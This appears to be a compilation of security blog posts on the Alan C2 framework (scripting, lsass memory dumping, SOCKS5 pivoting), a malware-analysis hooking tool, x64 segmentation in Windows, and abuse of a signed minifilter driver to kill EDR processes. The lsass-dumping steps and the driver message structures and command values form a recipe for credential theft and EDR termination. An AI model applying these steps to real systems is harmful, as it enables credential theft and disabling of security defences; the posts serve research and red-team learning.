Hello world from Javascript executed in process: 15532

If we use the wqjsx86.exe program, we obtain the following result (I'm running my test in a x64 OS).
C:\Alan.v6.0.511.24\tools>cqjsx86.exe --file test.js
Hello world from Javascript executed in process: 30844 - I'm running under Wow64 :)

As can be noticed, the result is different according to the used version.
Once that the script works as expected, we can run it in the Alan agent by simply using the run command and specifying the full path of the script.

Windows API Data Structure Interoperation

The GetProcAddress and the LoadLibrary should provide the basic functionality to call every Wind32 APIs. However, interacting with a native API might requires further information. A typical example are parameters that are used as buffer (both in input and output). When this is the case, the following rules apply:
  • Each JavaScript Array is considered as an array of bytes when passed to a Win32 function. Each byte is casted to uint8_t (this causes a data truncation and a potential data corruption). If the array contains other complex data types (such as a String) its value is converted to NULL.
  • Boolean values are converted to 1 if true and 0 if false.
  • Each number is converted to a 32-bit interger on x86 process, and to 64-bit integer on x64 process.
  • Each JavaScript String is converted to an ascii string when passed to a Win32 function.
  • You can not call functions with more than 20 parameters.

The rules above imply that:
  • Each parameter passed by address to a Win32 function needs to be converted to an array (eg. to pass a LPDWORD you have to create an Array(4) parater if running in 32-bit or an Array(8) if running in 64-bit).
  • If a Win32 function accept a structure, it needs to be converted to an Array too. For example, a PROCESSENTRY32 structure must be represented as an Array and then parsed by refercing the fields by their offset (an example using this structure is presented later with some helper function to simplify the job).

All these rules might be quite annoying during the development of a not trivial script. In the next section I'll show how to easier the development task by implementing an lsass process memory dumper.

Implementing a simple lsass.exe process memory dumper

This is a perfect case to explore more in-depth this new feature. Being able to dump the process memory of the lsass process is very import to further compromise an host. There are various techniques to achieve this goal, but for the sake of simplicity I'll go for the simpler one, by using the MiniDumpWriteDump function. I'll put the script on GitHub so you can have a look at its full source code.

Let's suppose that our Agent is running as Administrator, then the following points have to be considered to write the dumper:
  • Enable SE_DEBUG_NAME privilege.
  • Scan all processes to identify the lsass.exe process.
  • Create a mini dump of the lsass.exe process.

As first step we have to load all the needed functions. This is a trivial task and already demonstrated in the previous example. Enabling SE_DEBUG_NAME is the next step. To perform this action we have to use a TOKEN_PRIVILEGES structure. This structure is quite simple, so for this task we will just create an array of 0x10 bytes and reference the sTP.Privileges[0].Luid, the sTP.PrivilegeCount and the sTP.Privileges[0].Attributes by their array offset. After calling the AdjustTokenPrivileges function we are now reayd to proceed with the next and probably most complex step.

We have to identify the lsass.exe process. To achieve this goal we use the CreateToolhelp32Snapshot function to obtain a snapshot and loop through all processes untile we find a process whose name is lsass.exe. This implies the usage of a PROCESSENTRY32 structure which is not that simple. To easies the task I created various JavaScript functions helper that serialize an object to a JavaScript array. The serialization function inspects the prefix of each field name and according to its value a specific serialization action is performed. For example, field names that start dw_ are serializated as DWORD. Field names that start with p_ are serializated to a four bytes array or eigth bytes array according to the value of a global variable that I defined at the start of the script (this step can be more dynamic by using the IsWow64Process function). Thanks to these functions, working with structures is now a lot easier (see the script source code for full details).

The final step is to create a file and call the MiniDumpWriteDump function to create a file dump that you can now download to your machine for post-processing.


Now that we have create our script to dump the lsass.exe process memory, let's use it. The video below provides a demonstration about how to dump the lsass.exe process memory by running our JavaScript script in the agent.

Alan c2 Framework v7.0: Hyper-Pivoting

Twitter: @s4tan
Download: https://github.com/enkomio/AlanFramework/releases/latest
Documentation: https://github.com/enkomio/AlanFramework/tree/main/doc

A new Alan C2 Framework version was released, codename: Hyper-Pivoting. This new version includes some cool features like a proxy usage to allow the operator to easily pivoting through networks.

SOCKS5 Proxy

Network Pivoting is an essential part of every red-team activities and a must have feature for every C2 Framework. Alan v7.0 implements a proxy feature to easier network pivoting. By using the proxy command the operator can create a SOCKS5 compliant proxy on the machine where the agent is running, or interacting with an already running proxy.

Proxy chain is another useful feature that allows the operator to chain multiple proxies togheter. Creating a proxy chain is very simple, just use the command: proxy chain [proxy ID source] [proxy ID dest]. Some network segments can communicate only with specific addresses, this implies that reaching the C2 server is not an easy task. By using a chain of proxies the agent can establish a path to the Alan server and being able to compromise very segmented networks too.

The executed proxies are protected by a username and password. If the operator does no specify them, a randomly generated username and password is used (the operator can see the username and password by running the proxy command). As mentioned, the proxy are SOCKS5 proxies and can be used by any other programs that accept a SOCKS5 proxy.

One of the main Alan pillars is the in-memory execution of all its components, and the proxy has no exception. When a proxy is executed, its code runs inside the host process without touching the disk.

Misc features

Alan 7.0 includes other relevant features. The info command was improved by showing the Machine ID and if the agent is using a proxy. All Alan logs are now saved to the alan.log file. In addition, all the output generated by the Alan server and the commands inserted by the operator are saved to an evidence file. This allows the operator to include the evidence file as part of the red-team activity report.


The video below shows an example of proxy usage. After creating a proxy the Alan agent is instructed to use it. The video demonstrates that the running proxies are compliant to the SOCKS5 specification, by using one the created proxy with the curl utility. Next, a proxy chain is created and the network traffic displayed to show that the chain of proxies is traversed before to reach the Alan server.

TheMatrix - A process inspection tool aimed at easier the malware analysis task

Twitter: @s4tan
Download: https://github.com/enkomio/thematrix

In this post I'll describe a project that I created to easier the malware analysis process. The goal of the project is to run a target binary in a controlled environment and logging the Win32 function calls. I wanted to create something that is easy to extend and robust. I'm aware that other similar tools exists, but my intent was to have fun in doing Assembly programming and learning stuff that I only reversed but never implemented :)

How it works

TheMatrix is a program mostly written in assembly (x86/x64) that implements the following features:
  • It creates a PE loader (also referenced as an activator) that loads a user input binary (also know as target binary).
  • A multi-arch hook engine that monitors the Win32 API function calls.

Create an activator

The first task consists in creating an activator. This is a binary that once executed loads the embedded PE file (the target binary) and runs its entry-point. The activator will be a DLL if the targety binary is a DLL or an EXE otherwise. The activator exports an additional function which is DllRegisterServer. This function is commonly used by malware to start the main code.

Activator execution

When executed, the activator extracts the embedded binary and loads it in memory. Before executing the target binary entry-point, various Win32 function hooks are placed. This ensures that the malware execution is monitored. By default, TheMatrix implements various Windows hooks that log the input data to the folder: ./Desktop/thematrix/<PID>/<API_name>.log. During the PE loading step, the PEB.Ldr field is updated by including the target binary. This field contains a double linked list of all the currently loaded DLL and it is used by various Win32 API such as GetProcAddress. I still wonder why of the many PE loader projects available online, no one modifies the Ldr field.

TheMatrix Under the hood

The core of TheMatrix is implemented in assembly. This gave me the possibility to improve my x64 assembly programming skills and at the same time to implement features that I only reveresed. The x86 and x64 version have quite a few differences which are detailed below.

x86 Version

The 32-bit version of TheMatrix uses Microsoft Hot Patching mechanism to place the function hooks (see file x86_hook_engine.inc). The inserted JMP instruction will jump to a trampoline (a concept described later) that is placed in a code cave. The code cave is found by searching in the DLL sections. At execution time, when the API function is called by the target binary, the trampoline will execute and a jump to the user defined hook function is performed.

x64 Version

I started to implement the project in x86 assembly. As soon as I finished the initial version, the malware that I was interested in analysing switched to x64. This forced me to re-implement all the code in x64 assembly too (here is my reaction when I discovered this fact: https://twitter.com/s4tan/status/1516488723294298116).

When I decided to implement the x64 version too, I find myself in trouble since the x64 Win32 APIs do not support hot patching in the same way as the x86 version. This forced me to choose a different approach to place my hooks. In the end, I decided to use Export Address Table (EAT) hooking. As for the x86 version, a trampoline is used that will call the user defined hook function (see file x64_hook_engine.inc).

An additional aspect that is often ignored during the binary reversing process, it is that MS uses a different x64 function call convention when compared to x86 code (see this doc for more details). In addition, the stack needs to be 16 bytes aligned. In theory the concept is simple, but as often happens, the evil is in the details :) Luckily I found a useful 300 loc file that help me with this task (see https://twitter.com/s4tan/status/1522150733839273986).

Trampoline and hook function

The trampoline contains part of the magic that allowed me to create a clean design. Below you can see the x64 version of the trampoline code before being written to the identified code cave.
	mov rax, 011223344aabbccddh ; store the address of the original function
	mov qword ptr gs:[28h], rax ; TIB.ArbitraryUserPointer, see: https://codemachine.com/articles/arbitraryuserpointer_usage.html
	mov rax, 011223344aabbccddh ; hook function address
	jmp rax
Two places needs to be patched at runtime. The first is the address of the user defined function hook, and the second one is the original address of the hooked function. This latest information is necessary in order to easily call the original function as show in the section below. To store this value I choosed the TIB.ArbitraryUserPointer field which is part of the Thread Environment Block (or TIB in this case). This field is rarely used and is a good place to store our information. The only requirement is that the original function must be called in the same thread of the function hook.


As mentioned, the first step is to create the activator. This is achieved by using the -add command and specifying the target binary. TheMatrix will create a copy of itself containing the target binary. If the target binary is a DLL, TheMatrix will modify the activator file in order to result as a DLL and not as an EXE file. Once the activator is created, it can be executed in the same way as the target binary.

One of the main goal of my project was to create something that was really easy to update. Adding a new function hook must be a deadly easy operation. In the end I come up with a design where you can extend the project in a simple way, you just need a bit of Win32 API programming skill (you can implement your code in C, no Assembly programming required ^^). To place an hook you just need to use the hook_add function, by specifying the DLL name, the API function name and the user defined hook function. An example of call is the following one:

hook_add("Bcrypt.dll", "BCryptImportKeyPair", hook_BCryptImportKeyPair);
Then, you have to implements your function hook. To call the original function it is enough to use the call_original function by passing the input parameters of the original function. This kind of design is possible thanks to the freedom provided by programming in assembly. An example of usage is shown below.
LPVOID __stdcall hook_BCryptImportKeyPair(BCRYPT_ALG_HANDLE hAlgorithm, BCRYPT_KEY_HANDLE hImportKey, LPCWSTR pszBlobType, BCRYPT_KEY_HANDLE* phKey, PUCHAR pbInput, ULONG cbInput, ULONG dwFlags)
	// save imported key bytes
	char name[MAX_PATH] = { 0 };
	snprintf(name, sizeof(name), "BCryptImportKeyPair_%llx_%d", (uint64_t)pbInput, cbInput);
	log_data(cbInput, pbInput, name);

	LPVOID ret = call_original(
	return ret;
In the example above, the hook function logs the imported key before calling the original function. The final step is to inform TheMatrix of the available hooks before to run the target binary. This action is performed in the function hooks_init, whose definition is the following:
bool hooks_init(uint8_t* hMod)
The file hooks.c contains the function call, and can be customized by the user.


The following video shows an example of TheMatrix usage. The video shows the execution of a malware and demonstrates how TheMatrix is able to trace the execution of a new process and the extraction of relevant information. The malware is a famous one and it is not difficult to recognize it if you are into malware analysis ;)

The Segmented Memory Model and How It Works in Windows x64

I created this post as part of my jouring in getting more acquainted with the Intel architecture. Segmentation is a very important topic in the Intel architecture, so here is my contribution. For my experiment I'll use a x64 Windows 10 running in a VM attached to a kernel debugger.

Mode of Operations

The first step is to identify the processor mode of operation. x64 supports various modes and memory models. Let's try to identify the current one. This information is stored in the 32-bit CR0 control register ([1]), under the flag PE stored at position 0 (position 0 is the least significant bit (LSB), that is, the right-most bit). If this bit is set, we are running in protected mode, otherwise we are running in real-address mode. Let's use the kernel debugger to perform this check as shown in Figure 1.

kd> .formats cr0
Evaluate expression:
  Hex:     00000000`80050031
  Decimal: 2147811377
  Decimal (unsigned) : 2147811377
  Octal:   0000000000020001200061
  Binary:  00000000 00000000 00000000 00000000 10000000 00000101 00000000 00110001
  Chars:   .......1
  Time:    ***** Invalid
  Float:   low -4.59246e-040 high 0
  Double:  1.06116e-314
Figure 1. Operation Mode Identification
The CR0.PE bit is set to 1, so we are running in protected mode using a segmented memory model (you might also notice that the CR0.PG bit, at position 31 is set, indicating that we are also using paging). We can also check the sub-mode operation by inspecting the IA32_EFER Machine Specific Register (MSR) (0xC0000080) ([2]), and checking the LME (bit position 8) and LMA (bit position 10) flags. You can see the result in Figure 2.

kd> rdmsr 0xC0000080
msr[c0000080] = 00000000`00000d01
kd> .formats 00000000`00000d01
Evaluate expression:
  Hex:     00000000`00000d01
  Decimal: 3329
  Decimal (unsigned) : 3329
  Octal:   0000000000000000006401
  Binary:  00000000 00000000 00000000 00000000 00000000 00000000 00001101 00000001
  Chars:   ........
  Time:    Thu Jan  1 01:55:29 1970
  Float:   low 4.66492e-042 high 0
  Double:  1.64474e-320
Figure 2. Operation Sub-Mode Identification
The IA32_EFER.LMA and IA32_EFER.LME bits are set, so we are running in IA-32e sub-mode (64-bit). This information will be used later in the text.

Segmented Memory Model

The Segmented Memory Model accesses the memory by using the segment concept. A segment provides information on how to translate a given address. According to the executed instruction, a different segment is involved (eg. for call instruction the code segment is used, instead, for the push and pop instructions the stack segment is used). The Intel architecture defines a total of six segment registers: CS, DS, ES, SS, GS, and FS. For example, the CS segment (code segment) is used when a call instruction is executed. Let's see how this works with a practical example, let's consider the instruction in Figure 3.

00007FFD42C7D5C1 | E8 1A000000  | call kernelbase.7FFD42C7D5E0
Figure 3. How Segmentation Works
The call instruction uses the value 1A000000 to specify the address of the function to execute. Since we are in a x64 bit operation mode, the value is RIP-relative, this explains why the function address in the disassembly is 0x7FFD42C7D5E0 (0x7FFD42C7D5C1 (RIP) + 0x1a (offset) + 0x05 (instruction size)). In addition to the mentioned value, the value of the CS segment is also used. The combination of the CS with the function address is called the logical address. The segment value is then used to translate the logical address into what is known as the virtual address (this process is described in the next section). Since our system is using paging, and additional translation step is performed to translate the virtual address into the physical address (this topic is not covered in this post). All the translation steps are represented in Figure 4.
Figure 4. Logical to Physical Address Translation

How Segmentation Works

The segment registers are 16-bit registers whose structure is reported in Figure 5.
Figure 5. Segment Selector Format

The Index field is used as an index in a table that contains information on all the available segments. The TI flag indicates which table must be used, and the Request Privilege Level (RPL) field specifies the protection level of the code requesting access to a specific segment. The possible protection level values are: 0, 1, 2 and 3, and are often represented as protection rings, where ring 0 is the most privileged (where the kernel mode code is executed) and ring 3 is the least privileged (where user mode code is executed).

The two tables that contain information on the segments are the Global Descriptor Table (GDT) and the Local Descriptor Table (LDT). The registers GDTR and LDTR contain the base address of the respective table. In the latest Windows versions, the LDT is no more used, so the TI flag will always be 0. The GDT is an array of segment descriptors, where each segment descriptor is typically represented by the 64-bit structure reported in Figure 6.
Figure 6. Segment Descriptor Format

Given the segment descriptor definition, we can now explain how the logical address to virtual address translation is performed. The Base field is added to the logical address in order to obtain the virtual address. This process is described in Figure 7.
Figure 7. Segment Descriptor Usage in Address Translation

A very important field is DPL. It indicates the privilege level of the code running in that segment, for example, a DPL value of 0 can execute privileged instructions such as CLI. Another relevant field is L. This field indicates if the segment is running in Long mode (if it is set to 1) or in compatibility mode (if it is set to 0). Figure 8 shows how to inspect the GDT and all the defined segments.
kd> rgdtr
kd> db fffff804382f3fb0 
fffff804`382f3fb0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
fffff804`382f3fc0  00 00 00 00 00 9b 20 00-00 00 00 00 00 93 40 00  ...... .......@.
fffff804`382f3fd0  ff ff 00 00 00 fb cf 00-ff ff 00 00 00 f3 cf 00  ................
fffff804`382f3fe0  00 00 00 00 00 fb 20 00-00 00 00 00 00 00 00 00  ...... .........
fffff804`382f3ff0  67 00 00 20 2f 8b 00 38-04 f8 ff ff 00 00 00 00  g.. /..8........
fffff804`382f4000  00 3c 00 00 00 f3 40 00-00 00 00 00 00 00 00 00  .<.... fffff804 ................ kd> dg 10 50
                                                    P Si Gr Pr Lo
Sel        Base              Limit          Type    l ze an es ng Flags
---- ----------------- ----------------- ---------- - -- -- -- -- --------
0010 00000000`00000000 00000000`00000000 Code RE Ac 0 Nb By P  Lo 0000029b
0018 00000000`00000000 00000000`00000000 Data RW Ac 0 Bg By P  Nl 00000493
0020 00000000`00000000 00000000`ffffffff Code RE Ac 3 Bg Pg P  Nl 00000cfb
0028 00000000`00000000 00000000`ffffffff Data RW Ac 3 Bg Pg P  Nl 00000cf3
0030 00000000`00000000 00000000`00000000 Code RE Ac 3 Nb By P  Lo 000002fb
0038 00000000`00000000 00000000`00000000  0 Nb By Np Nl 00000000
0040 00000000`382f2000 00000000`00000067 TSS32 Busy 0 Nb By P  Nl 0000008b
0048 00000000`0000ffff 00000000`0000f804  0 Nb By Np Nl 00000000
0050 00000000`00000000 00000000`00003c00 Data RW Ac 3 Bg By P  Nl 000004f3
Figure 8. Dumping All Segments
The first two commands obtain the address of the GDT register and dump the memory value. The first non null entry is at offset 0x10 from the GDT base address (the first entry in the GDT is always null). To have a more readable view, we can use the dg command; it dumps all the segments and shows relevant information. There are various Code and Data segments, having as privilege 0 (kernel mode) and 3 (user mode).

In particular, there is a segment in user mode that is running in 32-bit compatibility mode (Long=0); its segment selector is 0x20. Similarly, there is a segment running in user mode as long mode (Long=0); its segment selector is 0x30.

Windows and the Flat Memory Model

You might have heard that Windows uses a flat memory model, but, we stated above that we are running in a segment memory model. What does it mean? By now, you know how a segment descriptor is used to compute the virtual address and we have also dumped all the segment descriptors defined in the system. You might have noticed that all the Code and Data segments have the Base address field to 0. This implies that Windows is not taking advantage of the segment concept, since having as Base always 0 has as result that the logical address is equal to the virtual address. This means that we are using a segmented memory model without using the segment concept. This mode is known as flat memory model. This statement is also reported by the Intel official documentation:

In 64-bit mode, segmentation is generally (but not completely) disabled, creating a flat 64-bit linear-address space. The processor treats the segment base of CS, DS, ES, SS as zero, creating a linear address that is equal to the effective address. The FS and GS segments are exceptions. These segment registers (which hold the segment base) can be used as additional base registers in linear address calculations. They facilitate addressing local data and certain operating system data structures. Note that the processor does not perform segment limit checks at runtime in 64-bit mode.

Decoding a Segment Register

Let's try decoding the value stored in a segment register. Let's consider the CS register, having value 0x33. This value in binary format is 00110011b. As described in Figure 5, bits 3-15 represent the index in the GDT table, which in this case have decimal value 6 (110b). To obtain the segment selector we have to multiply the index by the size of a segment descriptor, which is 8 bytes. Figure 9 shows this operation in the kernel debugger.

kd> .formats 0x33
Evaluate expression:
  Hex:     00000000`00000033
  Decimal: 51
  Decimal (unsigned) : 51
  Octal:   0000000000000000000063
  Binary:  00000000 00000000 00000000 00000000 00000000 00000000 00000000 00110011
  Chars:   .......3
  Time:    Thu Jan  1 01:00:51 1970
  Float:   low 7.14662e-044 high 0
  Double:  2.51973e-322
kd> dq gdtr + (6 * 8) L1
fffff804`382f3fe0  0020fb00`00000000
Figure 9. Obtain the Segment Selector
The segment descriptor value is 0020fb00`00000000. Now, let's use the dg and dt commands to display the segment descriptor associated with index 6, by using the operation 6 * 8 = 48 (0x30). The result is reported in Figure 10.

kd> dg 30
                                                    P Si Gr Pr Lo
Sel        Base              Limit          Type    l ze an es ng Flags
---- ----------------- ----------------- ---------- - -- -- -- -- --------
0030 00000000`00000000 00000000`00000000 Code RE Ac 3 Nb By P  Lo 000002fb
kd> dt nt!_KGDTENTRY64 fffff804`382f3fe0 -b
   +0x000 LimitLow         : 0
   +0x002 BaseLow          : 0
   +0x004 Bytes            : 
      +0x000 BaseMiddle       : 0 ''
      +0x001 Flags1           : 0xfb ''
      +0x002 Flags2           : 0x20 ' '
      +0x003 BaseHigh         : 0 ''
   +0x004 Bits             : 
      +0x000 BaseMiddle       : 0y00000000 (0)
      +0x000 Type             : 0y11011 (0x1b)
      +0x000 Dpl              : 0y11
      +0x000 Present          : 0y1
      +0x000 LimitHigh        : 0y0000
      +0x000 System           : 0y0
      +0x000 LongMode         : 0y1
      +0x000 DefaultBig       : 0y0
      +0x000 Granularity      : 0y0
      +0x000 BaseHigh         : 0y00000000 (0)
   +0x008 BaseUpper        : 0
   +0x00c MustBeZero       : 0
   +0x000 DataLow          : 0n9283176673312768
   +0x008 DataHigh         : 0n0
Figure 10. Dump of a Segment Descriptor
As you can see, the result is the same in both cases.

Experimenting With Kernel Mode and User Mode Code

Let's use windbg to inspect the segments of a piece of code running in kernel mode (Figure 11).

kd> r
rax=0000000000000003 rbx=fffff804382fde60 rcx=fffff804382fde60
rdx=fffff804382fde10 rsi=fffff80433b731a0 rdi=fffff80433b73190
rip=fffff80435414be5 rsp=fffff804382fdde8 rbp=0000000000000000
 r8=0000000000000003  r9=fffff804382fddf8 r10=0000000000000000
r11=fffff804382fddd0 r12=fffff80433b73100 r13=0000000000000000
r14=0000000000000100 r15=00000000ffffffff
iopl=0         nv up di ng nz na po nc
cs=0010  ss=0000  ds=002b  es=002b  fs=0053  gs=002b             efl=00040086
fffff804`35414be5 cc              int     3
Figure 11. 64-bit Kernel Mode Process Registers
As you can see, RIP points to kernel address, and the CS segment value is 0x10 that, according to the result from Figure 8, corresponds to a segment of type Code, with privilege 0 (the most privileged) and Long mode enabled. Now let's try the same experiment by analyzing a 64-bit user-mode process (Figure 12).
Figure 12. 64-bit User Mode Process Registers

The image shows a CS segment value of 0x33, that corresponds to a segment of type Code, with privilege 3 (the lowest privilege) and Long mode enabled. Finally, let's see an example of a 32-bit user-mode process running on a 64-bit OS (Figure 13).
Figure 13. 32-bit User Mode Process Registers

The image shows a CS with value 0x23, that corresponds to a segment of type Code, with privilege 3 and Long mode disabled. Since Long mode is disabled, this implies that the process is running in compatibility-mode (32-bit).

Segment Transition and Syscall

We mentioned that code running in kernel mode has a different CS value with DPL value 0. How is the segment transition performed? There are various ways to change the segment descriptor. One way is by using specific instructions that change the CS register, such as retf, which reads the new CS value from the stack. However, due to a lower DPL we can not use such a mechanism.

An alternative method is to use a call gate segment descriptor ([3]). However, this mechanism is not used in modern Windows OS, which prefers to use the syscall instruction. Among the various actions performed by this instruction, there is the change of the segment selector. But, how is the correct segment chosen? This information is obtained from the IA32_STAR (0xC0000081) MSR. Bit 32-47 are extracted and used as value for the new segment selector (which is 0x10 in case of transition to kernel mode). Let's use windbg to verify this aspect (Figure 14).

kd> rdmsr 0xC0000081
msr[c0000081] = 00230010`00000000
kd> .formats 00230010`00000000
Evaluate expression:
  Hex:     00230010`00000000
  Decimal: 9851692904349696
  Decimal (unsigned) : 9851692904349696
  Octal:   0000430001000000000000
  Binary:  00000000 00100011 00000000 00010000 00000000 00000000 00000000 00000000
  Chars:   .#......
  Time:    Sun Mar 21 11:08:10.434 1632 (UTC + 1:00)
  Float:   low 0 high 3.21426e-039
  Double:  5.28462e-308
kd> .formats 0y0000000000010000
Evaluate expression:
  Hex:     00000000`00000010
  Decimal: 16
  Decimal (unsigned) : 16
  Octal:   0000000000000000000020
  Binary:  00000000 00000000 00000000 00000000 00000000 00000000 00000000 00010000
  Chars:   ........
  Time:    Thu Jan  1 01:00:16 1970
  Float:   low 2.24208e-044 high 0
  Double:  7.90505e-323
kd> dg 10
                                                    P Si Gr Pr Lo
Sel        Base              Limit          Type    l ze an es ng Flags
---- ----------------- ----------------- ---------- - -- -- -- -- --------
0010 00000000`00000000 00000000`00000000 Code RE Ac 0 Nb By P  Lo 0000029b
Figure 14. Transition to DPL 0 Via Syscall Instruction
We first read the IA32_STAR MSR and extract the bits related to the new CS, whose value is 00000000 00010000. Converting this value to hex results in 0x10, which is exactly the same value that we obtained when we inspected the CS register in kernel mode in the previous section.

Heaven's Gates Consideration

If you reached this point, you now have all the information to understand the concept behind the Heaven's Gate mechanism, which is used to transition from x64 to x86 code in order to run 32-bit binaries. Microsoft created a specific segment descriptor for this purpose, assigning to it the value 0x20. The privileges between the two segment descriptors are the same, and it is possible to perform the transition by using one of the many instructions that take into consideration the CS register, such as retf or a far call. A lot of documentation is written on this aspect, and Microsoft refers to this with the name Windows-on-Windows (WoW64).


Modern OS are executed in protected mode under a flat segmented memory model. In this post we analyzed how this model works and how it can be used to change privilege levels. If you want to know more, I invite you to read the references.


[1] - Intelยฎ 64 and IA-32 Architectures Software Developerโ€™s Manual Volume 3 (3A): System Programming Guide - Chapter 2.5 CONTROL REGISTERS
[2] - Intelยฎ 64 and IA-32 Architectures Software Developerโ€™s Manual Volume 4: Model-Specific Registers - IA32_EFER
[3] - Intelยฎ 64 and IA-32 Architectures Software Developerโ€™s Manual Volume 3 (3A): System Programming Guide - Chapter 5.8.3 Call Gates
[4] - Call Gates' Ring Transitioning in IA-32 Mode
[5] - Bringing Call Gates Back
[6] - Windows Internals, Part 2, 7th Edition
[7] - Intelยฎ 64 and IA-32 Architectures Software Developerโ€™s Manual Volume 3A: System Programming Guide, Part 1
[8] - Intelยฎ 64 and IA-32 Architectures Software Developerโ€™s Manual Volume 1: Basic Architecture

Exploiting a vulnerable Minifilter Driver to create a process killer

Bring Your Own Vulnerable Driver (BYOVD) is a technique that uses a vulnerable driver in order to achieve a specific goal. BYOVD is often used by malware to terminate processes associated with security solutions such as an EDR. There are many examples of open-source software that (ab)use a vulnerable driver for this purpose. One the most used driver is the Process Explorer driver. In this case we cannot talk about a vulnerability since it is a feature of the application to permit process termination from its UI.

BYOVD is gaining more and more attention since attackers understood that it's a better strategy to terminate the EDR process instead than relying on obfuscation techniques in order to evade EDR detection.

In this blog post I'll analyze a signed driver that can be used to create a program able to terminate a specific process from the kernel. The driver is quite old but neverthless usable. The driver hash is 023d722cbbdd04e3db77de7e6e3cfeabcef21ba5b2f04c3f3a33691801dd45eb (probmon.sys).

Exploiting a Minifilter Signed Driver

The mentioned driver is a signed minifilter driver part of a security solution. One of the imported function is ZwTerminateProcess, so my goal is to check if it is possible to call this function on an arbitrary process.

The driver starts by calling the FltRegisterFilter function in order to register the filter. Next, a communication port is created by calling FltCreateCommunicationPort. The call specifies the parameter MessageNotifyCallback, implying that a user mode application can communicate with the minifilter by using the FilterSendMessage function. This callback does not expose the access to the ZwTerminateProcess function, but it is necessary in order to satisfy the needed preconditions.

After the creation of the communication port, the driver sets a process creation notification function by calling the function PsSetCreateProcessNotifyRoutine. The specified callback checks that the third argument of the callback, named Create, is false, if not, the function returns immediatly. This implies that only process termination are monitored by the driver. Under specific conditions, the notification callback function will call the ZwTerminateProcess function.

In order to terminate a process with the vulnerable driver, there are two preconditions that must be satisfied:
  1. The handle of the process to terminate is read from a global variable. We have to set this variable, otherwise when the driver tries to terminate a process a KeBugCheckEx will be called generating a BSOD
  2. The ZwTerminateProcess is called only if the value of the process ID calling into the minifilter is the same of the one associated with a global variable.

Set the target process handle

This requirement is satisfied by sending a message to the communication port by using the struct from Figure 1.

struct CommandSetPidToTerminate {
    command_type: u32,
    pid_to_kill: u32
Figure 1. Set Target Process Handle Message Structure
In this case the command_type parameter must assume value 3. This will cause the ZwOpenProcess to be called by using the pid_to_kill parameter, and the result assigned to the above mentioned global variable (let's call it process_handle_to_terminate).

Enable process termination

The second precondition involves a check on a global variable (let's call it it_s_a_me, you will understand why I choose this name in a moment). The value of this variable must be the same of the process ID that is exiting (remember that the callback is monitoring for process termination). This check is performed in the PsSetCreateProcessNotifyRoutine notification callback function. As before, this can be achieved by using the struct from Figure 2.

struct CommandEnableTermination {
    command_type: u32,
    data_count: u32,
    my_pid: u32
Figure 2. Set Global Variable To Enable Process Termination
In this case the command_type parameter must assume value 1. The data_count is used to copy the data that follow this parameter. In our case it is ok to set 1 as value (1 DWORD is copied) and set as value of the field my_pid our PID. In this way, our PID is written to the it_s_a_me global variable, satisfied our second precondition.

Triggering process termination

At this point we have set the handle of the process to terminate (variable process_handle_to_terminate) and we can reach the ZwTerminateProcess function thanks to the variable it_s_a_me.

When our process will exit, the PsSetCreateProcessNotifyRoutine notification callback will be called, the PID check will be satisfied by verifying that the variable it_s_a_me is equals to the process ID that is exiting, triggering the ZwTerminateProcess on the process_handle_to_terminate process. All this means that when our process killer program will exit, the target process will be killed :)

Source Code

Considering the plethora of such programs available on Github, releasing one more shouldn't be a huge problem. You can find the source code using the analyzed driver in my Github account:


Be consciuos that the driver is registered by using the flag FLTFL_REGISTRATION_DO_NOT_SUPPORT_SERVICE_STOP implying that the minifilter is not unloaded in response to service stop requests. In addition, the code STATUS_FLT_DO_NOT_DETACH is returned when you try to unload the driver with fltmc. In order to unload the driver you have to reboot your machine.


The goal of this blog post was to demonstrate how the malware use BYOVD technique in order to kill EDR processes. I analyzed a previously unknow vulnerable driver (to the best of my knowledge of course) demonstrating how a minifilter can also be abused for such purpose.


I'm currently focused on BYOVD technique used by malware to kill processes, so I haven't searched for more vulnerabilities in the driver. However, there is a nice buffer overflow in it but I'm unsure if it is exploitable or not :)